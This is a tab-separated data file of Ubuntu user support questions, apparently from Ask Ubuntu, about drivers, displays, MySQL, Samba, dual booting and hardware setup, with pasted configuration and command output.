484185	getting lock screen using vnc	using xubuntu 14.04 , connecting to the headless machine through vnc . xvnc4 is auto-started and it 's all fine . but when connecting with the vnc password i would like to get the login screen , or at least a question of login to unlock the machine instead of just entering a running session . also , using the lock screen in xfce is not working at all .
484186	can someone explain what this grep/cut/awk command is doing	this is inside of a .sh script file : cd /somefolder ip= $ ( ifconfig | grep 'inet addr : '| grep 168 | grep 192|cut -d : -f2 | awk ' { print $ 1 } ' ) the /somefolder has another folder list with a single text file in it . can someone explain what the above command is doing , it is combining bash , with grep and awk . also , to debug this and better understand it , is it possible for me to run this in the command line also ?
484191	coolermaster 5.1 headset not working properly on ubuntu 14.04	i 'm using a usb 5.1 surround sound headset and it 's not working how it should . i am able to use the 5.1 surround sound . sometimes even in steam games so it is possible . the problem exists when using the headset on skype or google hangouts . when i set it to `` analog surround 5.1 output + analog input '' in pulseaudio volume control i 'm not able to use my mic sometimes . usually i can but as soon as i activate my mic ( by pulling it down from the side ) my sound gets disabled . i need to reboot if i want sound again . if i set it to `` digital stereo iec958 output + analog input '' it works sometimes . usually it gets set to this automatically and i hear loud static when someone talks . ( probably because it tries to send stereo into a 5.1 channel ) . i need to set it to 5.1 take out the usb , kill pulseaudio , plug it back in and set it to digital stereo . only then do my sound and mic work . and this does n't even work every time . sometimes i need to reboot . as you can see a whole hassle just to talk to my friends on skype . i would love a solution for this problem . i 've searched online and all i could find was checking alsamixer but it shows my headset and 5.1 channels and 2 mic inputs ( just like pulseaudio ) . i 'm not sure what you information you need from me in order to help . tell me and i will provide : )
484193	third os partition advice	i am here because i need a little advice to create and install a 3rd os on my laptop . let me quickly epxplain , i have windows for my 3d work ( maya ) and gaming , then i started to move my cpp programming and opengl on ubuntu 12.04 . in order to make nvidia prime technology to work i needed to use backports and doing this way multiple screen is not supported , but i got everything else to work properly ( compiling , opengl etc ) . now i wish to update to ubuntu 14.04 where i can use all my screens ( total of 3 ) with nvidia-prime . i dont want to update dircectly the ubuntu 12.04 partition because it s a safeplace where everything works so i want to make a 3rd partition to do my tests with ubuntu 14.04 . now i tried that on my spare laptop and everytime i was resizing the partitions and make a new one ( from windows ) the grub was broken and i had to start from live cd and use boot repair . now my questions are : what s the best way to do this ? if i resize the partition from ubuntu is grub gon na be broken ? ( i wish not to try too much my luck doing over and over the repair ) ps : i actually have two hard drive c : full windows install d : ( data drive ) , 80 % data 20 % ubuntu 12.04 . thanks in advance cheers m .
484195	i downloaded ubuntu but i also had to download winzip in order to complete the download ?	i downloaded ubuntu and in order to complete the download i had to download winzip . i am so confused on why i had to that and what i have to do . i 'm on windows .
484196	gedit text size plugin keyboard shortcuts not working	from this answer the way to zoom in/out of text in gedit is by installing gedit-plugins , enabling the text size plugin and using ctrl + mouse scroll to zoom in/out . this does n't work in gedit 3.4.1 on ubuntu 12.04 . there are no changes on the text size - either increase or decrease . ctrl + + does n't work either and the only way is to select the menu directly in `` view '' - > `` increase/decrease font size '' . to get the 'right ' zoom , you will have to do this multiple times - for me it came to 8 times . how can i get the keyboard shortcuts working ? it 's tiring and time wasting . edit another interesting question ( check the first comment ) : how to zoom in and out of text in gedit ?
484203	docky hides when i maximize a window	docky hides every time i maximize a window . this is happening since i 've upgraded to 14.04
484207	is there a way to make the volume indicator show percentages on mouseover ? ( xubuntu )	i 'm using the indicator plugin in my panel to control the volume . it works well , however i never know the exact % of volume that i have selected . it 's the standard volume indicator as shown below : is there a way of making it show percentages on hover ?
484208	ubuntu 14.04 geforce 9800 gt	trying to set up ubuntu 14.04 on a system that has a geforce 9800 gt . after installing i have tried hooking up a dell 4k monitor . the system will boot up showing the ubuntu logo and then the screen will go dark . i have tried installing all of the nvidia drivers and none of them seem to work . i need help .
484211	add disk and use software raid	i have a lvm partition on a disk , and another , identical drive with no data on it . would it be possible to set up these two drives in raid 1 using mdadm , with the same lvm data on top ? perhaps by creating a raid array that 's missing a drive , copying all of the data from the partition over to it , and then formatting the partition , and adding it to the array ?
484216	specific folders uneditable , yet still accessible and writeable	the goal to have : a samba share in which any network user can create , modify and delete files and directories except for specific folders , which can not be modified or deleted but are still accessible/writeable . the use case for this being : a freely accessible ( samba ) shared network folder with certain `` reserved '' folders which serve a specific purpose . for example a ./public folder which is used by an http server to serve public files from . these folders should not be deleted , nor have their names changed . they should , however , allow any network user to still place files in there . my samba configuration ( only showing relevant directives , if any ) # when no authentication is attempted , allow access as `` nobody '' . map to guest = bad user guest account = nobody # the share in question . [ shared ] browsable = yes writable = yes public = yes # these next two lines are used in most of the solutions that come close to what i want . force user = share force group = share what i 've tried i 've tried many things , so what i 'm going to list below are `` solutions that came close '' . separate samba shares for every reserved folder gets nastier as more special folders are added . requires extra configuration time for every new folder . removing write permissions from the reserved folders disallows users to create new files within those folders . removing write permissions from the parent folder disallows users to create new files alongside the reserved folders . settings the i attribute on those folders prevents any change on or within the folder . setting the sticky bit on parent directory and taking shares ownership of the reserved folders away disallows users to create new files within the folders . setting the sticky bit on parent directory and taking shares ownership of the reserved folders away , but setting their mode to 777 allows users to change or delete the reserved folders . setting the sticky bit on parent directory , and claiming ownership of that directory disallows users to create new files alongside the reserved folders . setting the sticky bit on parent directory , and claiming ownership of that directory , but setting its mode to 777 allows users to change or delete the reserved folders . ( even when the ownership of those folders is also taken away from share ) i do wonder ... is this not possible within the ( standard ) linux permissions system ? it seems to me like something easy to express in language : `` you can see the folder , you can add or remove from the folder , you just ca n't modify the folder itself . '' so why wo n't my computer understand ! ?
484221	nvidia-settings detects no display	i have ubuntu 14.04 and nvidia driver 331.38 . my notebook has geforce gt 555m and intel graphic card . the ubuntu works fine except one issue . i wanted to connect two external monitors and realised that the nvidia-settings even does not detect the internal notebook display . in case , if i connect the hdmi and vga , the nvidia-settings shows me only vga display . output of nvidia-xconfig if no external displays are connected : nvidia-xconfig -- query-gpu-info number of gpus : 1 gpu # 0 : name : geforce gt 555m uuid : gpu-6bb6fcda-c642-b2ee-4040-3c4024d7f7a7 pci busid : pci:1:0:0 number of display devices : 0 output of nvidia-xconfig if two external displays are connected : nvidia-xconfig -- query-gpu-info number of gpus : 1 gpu # 0 : name : geforce gt 555m uuid : gpu-6bb6fcda-c642-b2ee-4040-3c4024d7f7a7 pci busid : pci:1:0:0 number of display devices : 1 display device 0 ( dfp-0 ) : edid name : samsung syncmaster minimum horizsync : 30.000 khz maximum horizsync : 81.000 khz minimum vertrefresh : 56 hz maximum vertrefresh : 75 hz maximum pixelclock : 140.000 mhz maximum width : 1280 pixels maximum height : 1024 pixels preferred width : 1280 pixels preferred height : 1024 pixels preferred vertrefresh : 60 hz physical width : 380 mm physical height : 300 mm output from xrandr : screen 0 : minimum 8 x 8 , current 1280 x 1024 , maximum 16384 x 16384 hdmi-0 connected primary 1280x1024+0+0 ( normal left inverted right x axis y axis ) 380mm x 300mm 1280x1024 60.0 + 75.0* 1280x960 60.0 1152x864 75.0 1024x768 75.0 70.1 60.0 800x600 75.0 72.2 60.3 56.2 640x480 75.0 72.8 59.9 lvds-1-0 connected 1280x1024+0+0 344mm x 194mm 1920x1080 60.0 + 59.9 1680x1050 60.0 59.9 1600x1024 60.2 1400x1050 60.0 1280x1024 60.0* 1440x900 59.9 1280x960 60.0 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 60.0 960x720 60.0 928x696 60.1 896x672 60.0 960x600 60.0 960x540 60.0 800x600 60.0 60.3 56.2 840x525 60.0 59.9 800x512 60.2 700x525 60.0 640x512 60.0 720x450 59.9 640x480 60.0 59.9 680x384 59.8 60.0 576x432 60.1 512x384 60.0 400x300 60.3 56.3 320x240 60.1 vga-1-0 connected 1280x1024+0+0 376mm x 301mm 1280x1024 60.0 + 75.0* 1280x960 60.0 1152x864 75.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 75.0 72.8 66.7 60.0 720x400 70.1 1280x1024 ( 0x4a ) 108.0mhz h : width 1280 start 1328 end 1440 total 1688 skew 0 clock 64.0khz v : height 1024 start 1025 end 1028 total 1066 clock 60.0hz 1280x960 ( 0x4c ) 108.0mhz h : width 1280 start 1376 end 1488 total 1800 skew 0 clock 60.0khz v : height 960 start 961 end 964 total 1000 clock 60.0hz 1024x768 ( 0x51 ) 65.0mhz h : width 1024 start 1048 end 1184 total 1344 skew 0 clock 48.4khz v : height 768 start 771 end 777 total 806 clock 60.0hz 800x600 ( 0x58 ) 40.0mhz h : width 800 start 840 end 968 total 1056 skew 0 clock 37.9khz v : height 600 start 601 end 605 total 628 clock 60.3hz 800x600 ( 0x59 ) 36.0mhz h : width 800 start 824 end 896 total 1024 skew 0 clock 35.2khz v : height 600 start 601 end 603 total 625 clock 56.2hz 640x480 ( 0x61 ) 25.2mhz h : width 640 start 656 end 752 total 800 skew 0 clock 31.5khz v : height 480 start 490 end 492 total 525 clock 59.9hz 1280x1024 ( 0x2e9 ) 135.0mhz h : width 1280 start 1296 end 1440 total 1688 skew 0 clock 80.0khz v : height 1024 start 1025 end 1028 total 1066 clock 75.0hz 1152x864 ( 0x2ea ) 108.0mhz h : width 1152 start 1216 end 1344 total 1600 skew 0 clock 67.5khz v : height 864 start 865 end 868 total 900 clock 75.0hz 1024x768 ( 0x2ec ) 75.0mhz h : width 1024 start 1048 end 1184 total 1328 skew 0 clock 56.5khz v : height 768 start 771 end 777 total 806 clock 70.1hz 800x600 ( 0x2ee ) 50.0mhz h : width 800 start 856 end 976 total 1040 skew 0 clock 48.1khz v : height 600 start 637 end 643 total 666 clock 72.2hz 800x600 ( 0x2ed ) 49.5mhz h : width 800 start 816 end 896 total 1056 skew 0 clock 46.9khz v : height 600 start 601 end 604 total 625 clock 75.0hz 640x480 ( 0x2ef ) 31.5mhz h : width 640 start 656 end 720 total 840 skew 0 clock 37.5khz v : height 480 start 481 end 484 total 500 clock 75.0hz the configuration xorg.conf # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 331.20 ( buildd @ roseapple ) mon feb 3 15:07:22 utc 2014 # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 331.38 ( buildmeister @ swio-display-x64-rhel04-15 ) wed jan 8 19:53:14 pst 2014 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` samsung syncmaster '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 555m '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` 1280x1024_75 +0+0 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection thank you a lot for your help !
484223	bamboo pen & touch - settings program	i wanted to use my wacom bamboo pen & touch on ubuntu 12.04 lts . the pc detects the tablet correct , but i do n't really like the settings in ubuntu . i would like to set custom hotkeys for the pen and tablet buttons , like in the original software from wacom . kde seems to have a better support http : //wiki.ubuntuusers.de/wacom_usb-tabletts any ideas how to get this gui for the settings ?
484224	recover windows 7 boot loader	i have mistakenly removed windows 7 boot loader from my primary drive , when i installed ubuntu 14.04 lts . i would like to have both oss on my machine . at this moment , windows 7 is on sda2 , ubuntu is on sda1 . how can i recover the previous loader for windows 7 and options with dual boot ?
484225	citrix opens and closes in ubuntu	i installed ubuntu 14.04 , this updated and installed directly from the icaclient receiver site . installation occurred without error , as i use the external address of the citrix ex : external link ee performs normal however when i run the internal address eg 192.168.0.1 or internal link , it opens the connection screen and closes . note : it normally logs in citrix , and when we go on desktops it opens the desktop only if connected by the external server , the internal server it does not connect . i look forward to help .
484226	toughbook cf-c2 touch screen not detected	i am trying to run ubuntu 14.04 lts with my toughbook cf-c2 . windows is on the other partion and everything works fine there but when i am on ubuntu it does not detect that the screen is a touchscreen . mabye its not compatible i dont know , any suggestions ? thanks for reading http : //www.panasonic.com/business/toughbook/semi-rugged-c2-convertible-tablet-pc.asp
484230	how to get into minecraft i cant figure out how to start playing	i downloaded minecraft and ca n't figure out how to start playing it please help.i tried looking at tutorials and they did n't work or got me to a old version where i could n't update .
484231	does duplicity detect when a backup is already in-progress ?	any time you schedule a recurring backup , it is always possible for a previously-initiated-backup to run so long that the next scheduled backup gets initiated before the previous backup completes . given the concept of duplicity 's backup-chains , does duplicity inherently check to see if a backup is already in-progress before allowing an additional attempt to modify that same backup chain ? i 'm aware of solutions to prevent this ( outside of duplicity ) , but my question is does duplicity 's code already inherently address this concern ?
484233	starting mysql server problems	i am trying to get mysql ( server ? ) to start . this is what i keep on getting : rather than invoking init scripts through /etc/init.d , use service ( 8 ) utility , e.g . service mysql start then when i do sudo service mysql start , i get : start : unknown job : mysql can someone please help me ? i am pretty sure it has something to do with my.cnf but i 'm not sure . here it is : # # the mysql database server configuration file . # # you can copy this to one of : # - `` /etc/mysql/my.cnf '' to set global options , # - `` ~/.my.cnf '' to set user-specific options . # # one can use all long options that the program supports . # run program with -- help to get a list of available options and with # -- print-defaults to see which it would actually understand and use . # # for explanations see # http : //dev.mysql.com/doc/mysql/en/server-system-variables.html # this will be passed to all mysql clients # it has been reported that passwords should be enclosed with ticks/quotes # escpecially if they contain `` # '' chars ... # remember to edit /etc/mysql/debian.cnf when changing the socket location . [ client ] port = 3306 socket = /var/run/mysqld/mysqld.sock # here is entries for some specific programs # the following values assume you have at least 32m ram # this was formally known as [ safe_mysqld ] . both versions are currently parsed . [ mysqld_safe ] socket = /var/run/mysqld/mysqld.sock nice = 0 [ mysqld ] # # * basic settings # user = mysql pid-file = /var/run/mysqld/mysqld.pid socket = /var/run/mysqld/mysqld.sock port = 3306 basedir = /usr datadir = /var/lib/mysql tmpdir = /tmp lc-messages-dir = /usr/share/mysql skip-external-locking # # instead of skip-networking the default is now to listen only on # localhost which is more compatible and is not less secure . bind-address = 192.168.1.21 # # * fine tuning # key_buffer = 16m max_allowed_packet = 16m thread_stack = 192k thread_cache_size = 8 # this replaces the startup script and checks myisam tables if needed # the first time they are touched myisam-recover = backup # max_connections = 100 # table_cache = 64 # thread_concurrency = 10 # # * query cache configuration # query_cache_limit = 1m query_cache_size = 16m # # * logging and replication # # both location gets rotated by the cronjob . # be aware that this log type is a performance killer . # as of 5.1 you can enable the log at runtime ! # general_log_file = /var/log/mysql/mysql.log # general_log = 1 # # error log - should be very few entries . # log_error = /var/log/mysql/error.log # # here you can see queries with especially long duration # log_slow_queries = /var/log/mysql/mysql-slow.log # long_query_time = 2 # log-queries-not-using-indexes # # the following can be used as easy to replay backup logs or for replication . # note : if you are setting up a replication slave , see readme.debian about # other settings you may need to change . # server-id = 1 # log_bin = /var/log/mysql/mysql-bin.log expire_logs_days = 10 max_binlog_size = 100m # binlog_do_db = include_database_name # binlog_ignore_db = include_database_name # # * innodb # # innodb is enabled by default with a 10mb datafile in /var/lib/mysql/ . # read the manual for more innodb related options . there are many ! # # * security features # # read the manual , too , if you want chroot ! # chroot = /var/lib/mysql/ # # for generating ssl certificates i recommend the openssl gui `` tinyca '' . # # ssl-ca=/etc/mysql/cacert.pem # ssl-cert=/etc/mysql/server-cert.pem # ssl-key=/etc/mysql/server-key.pem [ mysqldump ] quick quote-names max_allowed_packet = 16m [ mysql ] # no-auto-rehash # faster start of mysql but no tab completition [ isamchk ] key_buffer = 16m # # * important : additional settings that can override those from this file ! # the files must end with '.cnf ' , otherwise they 'll be ignored . # ! includedir /etc/mysql/conf.d/
484236	what is the command to bring up gui shutdown box ?	unity brings up a window with shutdown/reboot options when pressed my pc power button . but how to do that with a command ?
484237	how do i get the latest automake ?	this is very similar to warning : 'automake-1.11 ' is probably too old on ubuntu 12.04 lts , i 'm getting the following error message : warning : 'automake-1.14 ' is missing on your system . you should only need it if you modified 'makefile.am ' or 'configure.ac ' or m4 files included by 'configure.ac ' . the 'automake ' program is part of the gnu automake package : < http : //www.gnu.org/software/automake > it also requires gnu autoconf , gnu m4 and perl in order to run : < http : //www.gnu.org/software/autoconf > < http : //www.gnu.org/software/m4/ > < http : //www.perl.org/ > make : *** [ ../makefile.in ] error 1 i 've tried to use apt-get to install the latest automake but it claims that i 'm already up to date . the automake version i have , however , is 1.11 , so clearly i 'm not up to date . i do want to keep automake1.11 on the system so i do n't break anything that is relying on it . how do i get the latest version so i can get past this error ?
484243	can you tell the system which boot partition to boot into before you reboot in ubuntu-win dual boot ?	i have a dual boot system windows 7 64-bit and ubuntu 14.04 lts 64-bit freshly installed today and running . grub 2 is in charge of partition selection upon booting but i was wondering if there is a way to tell ubuntu which partition to boot into upon performing a reboot rather than having to wait for grub to load .
484245	make chrome app windows be always on top	simply put : is there any way to make chrome app windows have the always on top button when right clicking them ? i am using xubuntu 14.04 , and google-chrome dev . selecting 'use system title bar and borders ' just makes the sub window not have a title bar , and the default chrome title bar does n't have the option . i 'm also not 100 % sure that it is the chrome app window linked - it 's just a live-feed kind of dialog launched by a javascript function on the web page .
484248	deadlock and starvation conditions	i have some question concerning deadlocks . i have understood , the issue that can occur when more threads or processes are in critical section becuase of shared memory , and the solutions can be busy-wait , semaphore and mutex . however after that i start to get confused mutual exclusion no preemption hold and wait circular wait those conditions , do they cause deadlock/starvation to happen or do they prevent them from happening ? and is it one of them or all of them that has to be fulfilled ? i have understood that mutual exclusion is mutex , since it hold the critical section until finished . but the rest i am a bit insecure , how they work and what situations can be related to .
484252	after installing mysql-server , and doing $ mysql , mysql wo n't start . mysqld.sock missing	first , i installed mysql-server next , i did $ mysql i was going to add a database and edit some stuff . but i got this error : error 2002 ( hyooo ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) how do i fix this ? thanks for your time edit # 1 : i did this command : $ sudo service mysql start and i got this back : start : unknown job : mysql help ?
484256	ubuntu server 14 mysql php connect problem	i have ubuntu server 14.04 installed along side apache , php5 and mysql server all together . i can gain access to the server using putty and the mysql database using heidi sql remotely . on my laptop , using xampp to write and read from the database on the server works perfectly fine using php , but when the same code on the server is ran nothing happens the code stops at $ connect = mysql_connect ( $ host , $ user , $ pass ) or die ( 'connection error ' ) ; after the code is run off the server the page remains blank and does not even show the connection error message in the die section . note : apache , php and mysql works fines because all my web pages are in php .
484258	resolution 640x480 after installing nvidia display and cuda drivers for gtx 750 ti	i am using ubuntu 14.04 with an fx-6350 processor and a evga gtx 750 ti sc gpu . i installed the cuda and display drivers for the 750 ti using this tutorial : installing and testing cuda in ubuntu 14.04 after restarting lightdm , it works perfectly , but upon reboot , the resolution is stuck at 640 by 480 . if i log in , unity does n't load , just the background . i 'm also using a gigabyte motherboard . when i boot up , after post , it shows this : verifying dmi pool data ... ... ... ... error : no video mode activated [ 2.771245 ] nouveau e [ device ] [ 0000:01:00.0 ] unknown chipset , 0x117000a2 [ 2.771348 ] nouveau e [ drm ] failed to create 0x80000080 , -22
484263	what deteremines what usb bus devices get attached to ?	lsusb shows that my system has 4 buses . one has `` linux foundation 3.0 root hub '' as device 1 , the rest have `` linux foundation 2.0 root hub '' . the system has 10 physical ports . every single device i plug in shows up on bus 3 , one of the 2.0 hubs . i am trying to distribute some of the devices ( specifically cameras ) to other buses to avoid overloading the bandwidth ( related to this but with non logitech cameras . ) what determines what bus devices attach to ? is there a clear explanation of the relationship between usb controllers , hubs , busses , ports and linux anywhere ?
484264	swap keys for game	i want to swap tab key with left shift key for playing dota 2 from steam . i swap the keycodes of the keys and works fine until i start the game . i push tab ( it should be shift to queue actions ) but it does nothing and with shift still works . the more strange fact is that if i open the chat in dota2 i use tab like shift and the letters are uppercase ! ! anyone could help me ? thanks , sorry for my english .
484266	use ubuntu on tablet with mouse/keyboard ?	so here is the thing ... i have a nexus 7 ( 2012 ) , and the digitizer broke on me . to have it fixed would be pretty close to simply buying a new one . an ogt cable is super cheap . if i could install ubuntu on the 2012 nexus 7 , could i plug in an ogt then a mouse/keyboard , and use ubuntu that way ? i know unity is still work in progress , so for now i am open to other environments . would this work ? thank you for your time and answers
484267	is it possible , in xubuntu 14.04 , using nautilus , make it auto-mount usb and such as soon as it 's plugged and show in the notification area ?	i just changed thunar for nautilus in my xubuntu 14.04 and with the help of the community i made it working almost perfect now ! the only thing i 'm missing is that when i plug something on it , let 's say an usb or sd card , it does n't mount automatically , nor does it shows in the desktop , to access it i have to open nautilus and click on the drive , only then it shows on the desktop . i also wanted it to show in the notification area whenever i plug something like thunar used to do . thanks in advance .
484270	onboard in lubunto	i am trying to install lubunto on my tablet hp slate2 arm based atom 1.5ghz 2gb ram the problem i 'm having is that there is no 'onboard ' or on screen keyboard.so i ca n't finish the install ... . any suggestions would be greatly appreciated ... . i installed ubunto 14.04 on the tablet and the install went well all hardware appears supported however it 's to demanding on the cpu and very slow if anyone knows of a way to get lubunto installed on this machine or could recommend a lightweight distro that would be great
484274	1-2 minute ubuntu 14.04 boot time	i am going to be as specific as possible here . i just recently installed ubuntu 14.04 , upgrading from 13.10 . the boot time has been extremely slow ( like 1.5min to boot to desktop 1min to login screen ) . first i will state my hardware . i am running a tpower-i45 dual core cpu with 4gb of ddr2 ram . my gpu is a sapphire amd radeon hd 7850 ( i have tried the open-source drivers and the proprietary fglrx drivers , it stays at the same boot time ) . i have a 160gb sata drive which is where the os is installed . the first time i installed 14.04 i noticed this issue and reinstalled it and nothing changed . i will now go through exactly what happens when booting . first after the initial bios screen i get a purple rectangle around the edges of my monitors . this stays for about 8-10 seconds . then the screen turns black and stays black for 20-30 seconds . the ubuntu splash screen comes on for around 2 seconds then the screen goes black again . after having a black screen for another 30-40 seconds the ubuntu desktop will show up and everything from there works fine . if i choose to boot to the login screen boot time goes down about 15 seconds . i thought maybe my sata drive wasnât connected properly but it is connected fine . any help would be greatly appreciated . if this is just a bug i guess i could live with it as it doesnât effect the overall use of ubuntu but it does get a little annoying . could buying a new sata drive and using clonezilla to put ubuntu onto the new drive solve the problem if it is related to the sata drive ?
484276	why do i need to have superuser permissions to mount share to local mount point ?	well , title says it all , but to be more clear : to mount a share in a local mount point i need to do something like sudo mount -t cifs //location/to-share /home/ < user > /some/destination -o gid= < gid > , uid= < uid > , username= < username > conversely , doing this : mount -t cifs < all the other arguments > will result in mount : only root can do that . why ? why do i need to be superuser ? i am adding something to my home directory . then why do i need to superuser ? i 'm sure there is a valid reason , but it just strikes me as odd .
484277	ca n't read ubuntu partition on windows 8	i installed ubuntu 14.04 with a live cd , and it seemed to work . however , when i boot into windows 8 , it shows up as unallocated space . when i use gparted , it shows up properly . i wanted to use a dual-boot system using the windows 8 boot manager instead of grub . i have easybcd and that ca n't read the partition either . can anyone help ?
484278	login ubuntu source code	i 'm brian , i like to see the source code of the login screen but i donât know how i could enter to so the source code and see this part . because i want to make a app . thanks for their help .
484287	draft mode not working on epson xp-211 printer	i 've installed the available drivers provided by manufacturer but i still ca n't print in draft mode . i am able to select the option `` plain paper - speed '' but would still print in quality mode . i also ca n't print in two sided mode . any ideas ? txs
484288	driver for a trendnet usb-to-serial adapter for lubuntu 14.04 lts ?	i 'm running lubuntu 14.04 lts from a `` live disc '' ( usb ) and i want to connect a cisco 1841 router via a usb to serial converter ( specifically- trendnet tu-s9 ) to my netbook running the lubuntu 14.04 lts in order to practice cli ( command line interface ) operations . the converter came w/ drivers for windows & mac . do i need to install different drivers in order for this connection to work ? i have n't plugged it in yet because the converter instructions said not to plug it in prior to installing drivers .
484289	how do i get my sierra pci express card configured and working ?	i need to get a sierra wireless airprime mc7354 mini-pci express card working with ubuntu server 14.04 . the card has been activated on the verizon network and i 'm now trying to get the card configured on the ubuntu side . my fundamental problem is that the card is not exposing a network interface ( eg . wwan0 or similar ) , and while recognized by the os , it only shows up as a usb device . i have searched the forums quite thoroughly , but found no meaningful help through a related sierra card thread . the sierra wireless mc7354 datasheet is here , and you can find the tech specs here the device is recognized by the os and lsusb shows : bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 1199:68c0 sierra wireless , inc . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 002 : id 04ca:004b lite-on technology corp . bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub and modinfo sierra shows : filename : /lib/modules/3.13.0-24-generic/kernel/drivers/usb/serial/sierra.ko license : gpl description : usb driver for sierra wireless usb modems author : kevin lloyd , elina pasheva , matthew safar , rory filer srcversion : c5d0fab85ff8a5fe30b851a alias : usb : v413cp8133d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0f3dp68a3d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0f3dp68aad*dc*dsc*dp*icffiscffipffin* alias : usb : v1199p68a3d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6893d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6892d*dc*dsc*dp*icffiscffipffin* alias : usb : v1199p6891d*dc*dsc*dp*icffiscffipffin* alias : usb : v1199p6890d*dc*dsc*dp*icffiscffipffin* alias : usb : v1199p6880d*dc*dsc*dp*icffiscffipffin* alias : usb : v1199p685ad*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6859d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6856d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6855d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6853d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6852d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6851d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6850d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p683ed*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p683dd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p683cd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p683bd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p683ad*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6839d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6838d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6835d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6834d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6833d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6832d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6822d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6821d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6820d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6816d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6815d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6813d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6812d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6809d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6808d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6805d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6804d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6803d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p6802d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p0029d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p0028d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p0027d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p0026d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p0025d*dc*dsc*dp*icffiscffipffin* alias : usb : v1199p0023d*dc*dsc*dp*icffiscffipffin* alias : usb : v1199p0301d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p0120d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p0112d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p0021d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p0019d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p0224d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p0024d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p0022d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p0220d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p0020d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p0218d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p0018d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v1199p0017d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v03f0p1e1dd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v03f0p211dd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v03f0p1b1dd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0f3dp0112d*dc*dsc*dp*ic*isc*ip*in* depends : usbserial intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key 